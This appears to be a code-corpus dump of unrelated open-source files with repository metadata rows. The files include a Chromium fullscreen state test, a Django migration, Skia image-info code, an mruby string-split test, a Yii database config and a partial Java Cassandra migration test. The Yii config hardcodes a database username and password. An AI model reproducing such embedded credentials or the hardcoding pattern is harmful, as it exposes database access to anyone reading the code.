// would not be exposed by traversing to each state via TransitionToState().
// TransitionToState() always takes the same path even when multiple paths
// exist.
TEST_F(FullscreenControllerStateUnitTest, TransitionsForEachState) {
// A tab is needed for tab fullscreen.
AddTab(browser(), GURL(chrome::kAboutBlankURL));
TestTransitionsForEachState();
// Progress of test can be examined via LOG(INFO) << GetAndClearDebugLog();
}
// Individual tests for each pair of state and event:
TEST_EVENT(STATE_NORMAL, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_NORMAL, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_NORMAL, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_NORMAL, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_NORMAL, METRO_SNAP_TRUE);
TEST_EVENT(STATE_NORMAL, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_NORMAL, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_NORMAL, BUBBLE_ALLOW);
TEST_EVENT(STATE_NORMAL, BUBBLE_DENY);
TEST_EVENT(STATE_NORMAL, WINDOW_CHANGE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, WINDOW_CHANGE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, WINDOW_CHANGE);
#if defined(OS_WIN)
TEST_EVENT(STATE_METRO_SNAP, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_METRO_SNAP, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_METRO_SNAP, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_METRO_SNAP, TAB_FULLSCREEN_FALSE);
TEST_EVENT(STATE_METRO_SNAP, METRO_SNAP_TRUE);
TEST_EVENT(STATE_METRO_SNAP, METRO_SNAP_FALSE);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_ALLOW);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_DENY);
TEST_EVENT(STATE_METRO_SNAP, WINDOW_CHANGE);
#endif
TEST_EVENT(STATE_TAB_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_FULLSCREEN, WINDOW_CHANGE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, WINDOW_CHANGE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, WINDOW_CHANGE);
TEST_EVENT(STATE_TO_NORMAL, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_NORMAL, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_NORMAL, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_NORMAL, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_NORMAL, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_NORMAL, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_DENY);
TEST_EVENT(STATE_TO_NORMAL, WINDOW_CHANGE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, WINDOW_CHANGE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, WINDOW_CHANGE);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, WINDOW_CHANGE);
// Specific one-off tests for known issues:
// TODO(scheib) Toggling Tab fullscreen while pending Tab or
// Browser fullscreen is broken currently http://crbug.com/154196
TEST_F(FullscreenControllerStateUnitTest,
DISABLED_ToggleTabWhenPendingBrowser) {
#if !defined(OS_WIN) // Only possible without reentrancy
AddTab(browser(), GURL(chrome::kAboutBlankURL));
ASSERT_NO_FATAL_FAILURE(
TransitionToState(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME))
<< GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_TRUE)) << GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_FALSE)) << GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(WINDOW_CHANGE)) << GetAndClearDebugLog();
#endif
}
// TODO(scheib) Toggling Tab fullscreen while pending Tab or
// Browser fullscreen is broken currently http://crbug.com/154196
TEST_F(FullscreenControllerStateUnitTest, DISABLED_ToggleTabWhenPendingTab) {
#if !defined(OS_WIN) // Only possible without reentrancy
AddTab(browser(), GURL(chrome::kAboutBlankURL));
ASSERT_NO_FATAL_FAILURE(
TransitionToState(STATE_TO_TAB_FULLSCREEN))
<< GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_TRUE)) << GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_FALSE)) << GetAndClearDebugLog();
ASSERT_TRUE(InvokeEvent(WINDOW_CHANGE)) << GetAndClearDebugLog();
#endif
}
// Debugging utility: Display the transition tables. Intentionally disabled
TEST_F(FullscreenControllerStateUnitTest, DISABLED_DebugLogStateTables) {
std::ostringstream output;
output << "\n\nTransition Table:";
output << GetTransitionTableAsString();
output << "\n\nInitial transitions:";
output << GetStateTransitionsAsString();
// Calculate all transition pairs.
for (int state1_int = 0; state1_int < NUM_STATES; state1_int++) {
State state1 = static_cast<State>(state1_int);
for (int state2_int = 0; state2_int < NUM_STATES; state2_int++) {
State state2 = static_cast<State>(state2_int);
if (ShouldSkipStateAndEventPair(state1, EVENT_INVALID) ||
ShouldSkipStateAndEventPair(state2, EVENT_INVALID))
continue;
// Compute the transition
if (NextTransitionInShortestPath(state1, state2, NUM_STATES).state ==
STATE_INVALID) {
LOG(ERROR) << "Should be skipping state transitions for: "
<< GetStateString(state1) << " " << GetStateString(state2);
}
}
}
output << "\n\nAll transitions:";
output << GetStateTransitionsAsString();
LOG(INFO) << output.str();
}
| zcbenz/cefode-chromium | chrome/browser/ui/fullscreen/fullscreen_controller_state_unittest.cc | C++ | bsd-3-clause | 21,739 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-12 08:55
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import tagulous.models.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='tag',
name='label',
field=models.CharField(default='', help_text='The name of the tag, without ancestors', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='tag',
name='level',
field=models.IntegerField(default=1, help_text='The level of the tag in the tree'),
),
migrations.AddField(
model_name='tag',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='core.Tag'),
),
migrations.AddField(
model_name='tag',
name='path',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AlterField(
model_name='analysis',
name='tags',
field=tagulous.models.fields.TagField(_set_tag_meta=True, force_lowercase=True, help_text='Enter a comma-separated tag string', to='core.Tag', tree=True),
),
migrations.AlterField(
model_name='experiment',
name='tags',
field=tagulous.models.fields.TagField(_set_tag_meta=True, force_lowercase=True, help_text='Enter a comma-separated tag string', to='core.Tag', tree=True),
),
migrations.AlterUniqueTogether(
name='tag',
unique_together=set([('slug', 'parent')]),
),
]
| Candihub/pixel | apps/core/migrations/0002_auto_20171012_0855.py | Python | bsd-3-clause | 1,878 |
/*
* Copyright 2010 Google Inc.
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#include "SkImageInfo.h"
#include "SkReadBuffer.h"
#include "SkWriteBuffer.h"
static bool profile_type_is_valid(SkColorProfileType profileType) {
return (profileType >= 0) && (profileType <= kLastEnum_SkColorProfileType);
}
static bool alpha_type_is_valid(SkAlphaType alphaType) {
return (alphaType >= 0) && (alphaType <= kLastEnum_SkAlphaType);
}
static bool color_type_is_valid(SkColorType colorType) {
return (colorType >= 0) && (colorType <= kLastEnum_SkColorType);
}
void SkImageInfo::unflatten(SkReadBuffer& buffer) {
fWidth = buffer.read32();
fHeight = buffer.read32();
uint32_t packed = buffer.read32();
SkASSERT(0 == (packed >> 24));
fProfileType = (SkColorProfileType)((packed >> 16) & 0xFF);
fAlphaType = (SkAlphaType)((packed >> 8) & 0xFF);
fColorType = (SkColorType)((packed >> 0) & 0xFF);
buffer.validate(profile_type_is_valid(fProfileType) &&
alpha_type_is_valid(fAlphaType) &&
color_type_is_valid(fColorType));
}
void SkImageInfo::flatten(SkWriteBuffer& buffer) const {
buffer.write32(fWidth);
buffer.write32(fHeight);
SkASSERT(0 == (fProfileType & ~0xFF));
SkASSERT(0 == (fAlphaType & ~0xFF));
SkASSERT(0 == (fColorType & ~0xFF));
uint32_t packed = (fProfileType << 16) | (fAlphaType << 8) | fColorType;
buffer.write32(packed);
}
bool SkColorTypeValidateAlphaType(SkColorType colorType, SkAlphaType alphaType,
SkAlphaType* canonical) {
switch (colorType) {
case kUnknown_SkColorType:
alphaType = kIgnore_SkAlphaType;
break;
case kAlpha_8_SkColorType:
if (kUnpremul_SkAlphaType == alphaType) {
alphaType = kPremul_SkAlphaType;
}
// fall-through
case kIndex_8_SkColorType:
case kARGB_4444_SkColorType:
case kRGBA_8888_SkColorType:
case kBGRA_8888_SkColorType:
if (kIgnore_SkAlphaType == alphaType) {
return false;
}
break;
case kRGB_565_SkColorType:
alphaType = kOpaque_SkAlphaType;
break;
default:
return false;
}
if (canonical) {
*canonical = alphaType;
}
return true;
}
| chenlian2015/skia_from_google | src/core/SkImageInfo.cpp | C++ | bsd-3-clause | 2,443 |
#!/usr/bin/env python3
#==============================================================================
# author : Pavel Polishchuk
# date : 14-08-2019
# version :
# python_version :
# copyright : Pavel Polishchuk 2019
# license :
#==============================================================================
__version__ = "0.2.9"
| DrrDom/crem | crem/__init__.py | Python | bsd-3-clause | 379 |
<?php
return [
'class' => 'yii\db\Connection',
'dsn' => 'mysql:host=localhost;dbname=yii2bank',
'username' => 'bankadmin',
'password' => '0Filfn6BcjvvgHy6',
'charset' => 'utf8',
];
| K4lx4s/yii2bank | config/db.php | PHP | bsd-3-clause | 202 |
# frozen_string_literal: true
class StringSplitTest < MrubycTestCase
#
# Regex not supprted.
#
description "Sring"
def string_case
assert_equal ["a","b","c"], "a,b,c".split(",")
assert_equal ["a","","b","c"], "a,,b,c".split(",")
assert_equal ["a","b:c","d"], "a::b:c::d".split("::")
assert_equal ["a","b:c","d:"], "a::b:c::d:".split("::")
assert_equal ["a","b:c","d"], "a::b:c::d::".split("::")
assert_equal ["a", "b:c", "d", ":"], "a::b:c::d:::".split("::")
end
description "space"
def space_case
assert_equal ["a", "b", "c"], " a \t b \n c\r\n".split(" ")
assert_equal ["a", "b", "c"], "a \t b \n c\r\n".split(" ")
assert_equal ["a", "b", "c"], " a \t b \n c".split(" ")
assert_equal ["a", "b", "c"], "a \t b \n c".split(" ")
assert_equal ["aa", "bb", "cc"], " aa bb cc ".split(" ")
assert_equal ["aa", "bb", "cc"], "aa bb cc ".split(" ")
assert_equal ["aa", "bb", "cc"], " aa bb cc".split(" ")
assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ")
end
description "nil"
def nil_case
assert_equal ["a", "b", "c"], " a \t b \n c".split()
assert_equal ["a", "b", "c"], " a \t b \n c".split(nil)
end
description "empty string"
def empty_string_case
assert_equal [" ", " ", " ", "a", " ", "\t", " ", " ", "b", " ", "\n", " ", " ", "c"], " a \t b \n c".split("")
end
description "limit"
def limit_case
assert_equal ["a", "b", "", "c"], "a,b,,c,,".split(",", 0)
assert_equal ["a,b,,c,,"], "a,b,,c,,".split(",", 1)
assert_equal ["a", "b,,c,,"], "a,b,,c,,".split(",", 2)
assert_equal ["a", "b", ",c,,"], "a,b,,c,,".split(",", 3)
assert_equal ["a", "b", "", "c,,"], "a,b,,c,,".split(",", 4)
assert_equal ["a", "b", "", "c", ","], "a,b,,c,,".split(",", 5)
assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", 6)
assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", 7)
assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", -1)
assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", -2)
assert_equal ["aa", "bb", "cc"], " aa bb cc ".split(" ", 0)
assert_equal [" aa bb cc "], " aa bb cc ".split(" ", 1)
assert_equal ["aa", "bb cc "], " aa bb cc ".split(" ", 2)
assert_equal ["aa", "bb", "cc "], " aa bb cc ".split(" ", 3)
assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ", 4)
assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ", 5)
assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ",-1)
assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 0)
assert_equal ["aa bb cc"], "aa bb cc".split(" ", 1)
assert_equal ["aa", "bb cc"], "aa bb cc".split(" ", 2)
assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 3)
assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 4)
assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ",-1)
end
description "empty source"
def empty_source_case
assert_equal [], "".split(",")
assert_equal [], "".split(",", 0)
assert_equal [], "".split(",", 1)
assert_equal [], "".split(",",-1)
assert_equal [], "".split("")
assert_equal [], "".split("", 0)
assert_equal [], "".split("", 1)
assert_equal [], "".split("",-1)
assert_equal [], "".split(" ")
assert_equal [], "".split(" ", 0)
assert_equal [], "".split(" ", 1)
assert_equal [], "".split(" ",-1)
end
description "delimiter only"
def delimiter_only_case
assert_equal [], ",".split(",")
assert_equal [], ",".split(",", 0)
assert_equal [","], ",".split(",", 1)
assert_equal ["",""], ",".split(",",-1)
assert_equal [], ",,".split(",")
assert_equal [], ",,".split(",", 0)
assert_equal [",,"], ",,".split(",", 1)
assert_equal ["","",""],",,".split(",",-1)
assert_equal [], " ".split(" ")
assert_equal [], " ".split(" ", 0)
assert_equal [" "], " ".split(" ", 1)
assert_equal [""], " ".split(" ",-1)
assert_equal [], " ".split(" ")
assert_equal [], " ".split(" ", 0)
assert_equal [" "], " ".split(" ", 1)
assert_equal [""], " ".split(" ",-1)
end
end
| mrubyc/mrubyc | test/string_split_test.rb | Ruby | bsd-3-clause | 4,453 |
/***********************************************************************************************************************
**
** Copyright (c) 2011, 2014 ETH Zurich
** All rights reserved.
**
** Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
** following conditions are met:
**
** * Redistributions of source code must retain the above copyright notice, this list of conditions and the
** following disclaimer.
** * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
** following disclaimer in the documentation and/or other materials provided with the distribution.
** * Neither the name of the ETH Zurich nor the names of its contributors may be used to endorse or promote products
** derived from this software without specific prior written permission.
**
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
** INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
** DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
** SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
** WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
** OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**
**********************************************************************************************************************/
#include "Cell.h"
namespace OOInteraction {
Cell::Cell(int x, Visualization::Item* item, int stringComponentsStart, int stringComponentsEnd)
: Cell(x, 0, 1, 1, item, stringComponentsStart, stringComponentsEnd)
{}
Cell::Cell(int x, int y, Visualization::Item* item, int stringComponentsStart, int stringComponentsEnd)
: Cell(x, y, 1, 1, item, stringComponentsStart, stringComponentsEnd)
{}
Cell::Cell(int x, int y, int width, int height, Visualization::Item* item, int stringComponentsStart,
int stringComponentsEnd)
: region_(x, y, width, height), item_(item), stringComponentsStart_(stringComponentsStart),
stringComponentsEnd_(stringComponentsEnd < 0 ? stringComponentsStart : stringComponentsEnd)
{
}
Cell::~Cell()
{
}
int Cell::offset(const QStringList& allComponents, Qt::Key key, int* length)
{
int l = 0;
for (int i = stringComponentsStart(); i <= stringComponentsEnd(); ++i)
l += allComponents[i].length();
if (length) *length = l;
return StringOffsetProvider::itemOffset(item(), l, key);
}
void Cell::setOffset(int newOffset)
{
StringOffsetProvider::setOffsetInItem(newOffset, item());
}
} /* namespace OOInteraction */
| patrick-luethi/Envision | OOInteraction/src/string_offset_providers/Cell.cpp | C++ | bsd-3-clause | 2,984 |
# Copyright (c) 2015, National Documentation Centre (EKT, www.ekt.gr)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# Neither the name of the National Documentation Centre nor the
# names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
__author__ = 'kutsurak'
class RundeckException(Exception):
def __init__(self, *args, **kwargs):
super(RundeckException, self).__init__(*args, **kwargs)
| EKT/pyrundeck | pyrundeck/exceptions.py | Python | bsd-3-clause | 1,781 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by ExopyPulses Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Sequence context used for testing.
"""
from atom.api import Float, set_default
from exopy_pulses.pulses.contexts.base_context import BaseContext
class DummyContext(BaseContext):
"""Context limited to testing purposes.
"""
logical_channels = set_default(('Ch1_L', 'Ch2_L'))
analogical_channels = set_default(('Ch1_A', 'Ch2_A'))
sampling = Float(1.0)
def compile_and_transfer_sequence(self, sequence, driver=None):
"""Simply evaluate and simplify the underlying sequence.
"""
items, errors = self.preprocess_sequence(sequence)
if not items:
return False, {}, errors
return True, {'test': True}, {}
def list_sequence_infos(self):
return {'test': False}
def _get_sampling_time(self):
return self.sampling
| Ecpy/ecpy_pulses | exopy_pulses/testing/context.py | Python | bsd-3-clause | 1,203 |
package uk.sky.cqlmigrate;
import com.datastax.oss.driver.api.core.ConsistencyLevel;
import com.datastax.oss.simulacron.common.cluster.ClusterSpec;
import com.datastax.oss.simulacron.common.cluster.DataCenterSpec;
import com.datastax.oss.simulacron.common.cluster.QueryLog;
import com.datastax.oss.simulacron.common.cluster.RequestPrime;
import com.datastax.oss.simulacron.common.request.Query;
import com.datastax.oss.simulacron.common.result.SuccessResult;
import com.datastax.oss.simulacron.common.stubbing.Prime;
import com.datastax.oss.simulacron.common.stubbing.PrimeDsl;
import com.datastax.oss.simulacron.server.BoundCluster;
import com.datastax.oss.simulacron.server.Server;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.Lists;
import org.apache.cassandra.exceptions.ConfigurationException;
import org.junit.*;
import uk.sky.cqlmigrate.util.PortScavenger;
import java.net.Inet4Address;
import java.net.InetSocketAddress;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.*;
import java.util.stream.Collectors;
import static com.datastax.oss.simulacron.common.stubbing.PrimeDsl.*;
import static java.lang.String.valueOf;
import static java.util.Arrays.asList;
import static org.assertj.core.api.Assertions.assertThat;
public class CqlMigratorConsistencyLevelIntegrationTest {
private static final String CLIENT_ID = UUID.randomUUID().toString();
private static final int defaultStartingPort = PortScavenger.getFreePort();
private static final Server server = Server.builder().build();
private static final ClusterSpec clusterSpec = ClusterSpec.builder().build();
private static final String username = "cassandra";
private static final String password = "cassandra";
private static final String TEST_KEYSPACE = "cqlmigrate_test";
private static final String LOCAL_DC = "DC1";
private Collection<Path> cqlPaths;
private static BoundCluster cluster;
private final CassandraLockConfig lockConfig = CassandraLockConfig.builder().build();
@BeforeClass
public static void classSetup() throws UnknownHostException {
DataCenterSpec dc = clusterSpec.addDataCenter().withName("DC1").withCassandraVersion("3.11").build();
dc.addNode()
.withAddress(new InetSocketAddress(Inet4Address.getByAddress(new byte[]{127, 0, 0, 1}), defaultStartingPort))
.withPeerInfo("host_id", UUID.randomUUID())
.build();
cluster = server.register(clusterSpec);
cluster.prime(when("select cluster_name from system.local where key = 'local'")
.then(rows().row("cluster_name", "0").build()));
}
@Before
public void baseSetup() throws Exception {
cluster.clearPrimes(true);
cluster.clearLogs();
setupKeyspace(TEST_KEYSPACE);
initialiseLockTable();
}
@AfterClass
public static void destroy() {
